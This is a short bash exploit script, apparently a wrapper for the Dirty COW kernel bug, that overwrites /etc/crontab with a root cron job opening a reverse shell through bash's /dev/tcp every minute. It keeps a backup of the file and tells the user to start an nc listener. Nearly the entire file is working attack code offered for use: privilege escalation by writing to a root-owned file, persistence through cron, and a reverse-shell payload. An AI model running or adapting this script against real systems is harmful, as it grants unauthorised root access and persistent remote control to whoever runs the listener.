#!/bin/bash
#
# Add a job to /etc/crontab that tries to open a reverse root shell at
# localhost:8080 every minute. A backup of /etc/crontab is stored in $HOME
# before modifying the file.
#
# Once the exploit completes, open a TCP server on localhost:8080. For example:
#
#	nc -lp 8080 localhost

. "$(dirname "$0")/common.sh"

# note the trailing '#' to ignore any garbage from the old line
payload="*/1 * * * * root bash -c 'bash -i>&/dev/tcp/localhost/8080 0>&1' #"
payload_len=$(printf "$payload" | wc -c)

if [ ! -r /etc/crontab ]; then
	die "/etc/crontab does not exist or is not readable."
elif [ "$(wc -c </etc/crontab)" -lt "$payload_len" ]; then
	die "/etc/crontab is not large enough to insert payload."
fi

backup /etc/crontab "$HOME/crontab"
dirtycow -s "$payload" /etc/crontab
